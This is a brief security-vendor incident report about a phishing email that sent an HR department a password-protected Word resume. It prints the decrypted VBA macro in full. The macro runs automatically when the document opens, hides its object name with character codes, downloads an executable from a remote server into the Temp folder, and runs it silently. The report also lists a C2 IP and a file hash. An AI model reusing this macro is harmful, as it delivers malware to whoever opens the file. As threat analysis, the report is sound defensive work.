February 21, 2019

Incident Report: CV or Cyber Vector.

Perception Point Incident Response Team

Would You Hire a Hacker?.

Would you? One of clients HR department received an email containing a Resume. The email stated that the attached word document is password protected and provided the password inside the email.

The user has to enter the password manually, a process that can cause issues to an automated system that check the file for malicious activity. After the user enters the password the file becomes a common attack of a malicious macro code that executes malicious commands. The macro code is also encrypted making the detection even harder. Perception Point’s file decryption feature that extracts the malicious code from an encrypted file. The code downloads a malicious exe to the temp folder from a server and activates it.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
    
WinHttpReq.Open "GET", "http://X.X.X.X/troll1.jpg", False, "username", "password"
WinHttpReq.send
Dim first5 As String
    Dim second5 As String
    Dim last5 As String
    first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)
    second5 = ChrW(97) & ChrW(109)
    last5 = first5 + second5
xyuhjnx = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
    Set oStream = CreateObject(last5)
    oStream.Open
    oStream.Type = Val("1FFF")
    oStream.Write WinHttpReq.responseBody
    
    Dim first6 As String
    Dim last6 As String
    first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)
    last6 = first6
    
    oStream.SaveToFile Environ("Temp") + "\qwerty2.exe", Val("2FFF")
    oStream.Close
    
End If
 
Call Shell(Environ("Temp") + "\qwerty2.exe", 0)
End Sub

 

IOC’s

C2 Server IP - 209.141.55.226
qwerty2.exe - 2b5f43fdb4678f82874bbe424a60fde3ae547dd6697ef46d45febc17dfbef9b3 (SHA-256) VT score 12/69 2019-02-21 15:13:33 UTC

 

Want to know more?

Contact Us.



Link has been copied to your clipboard!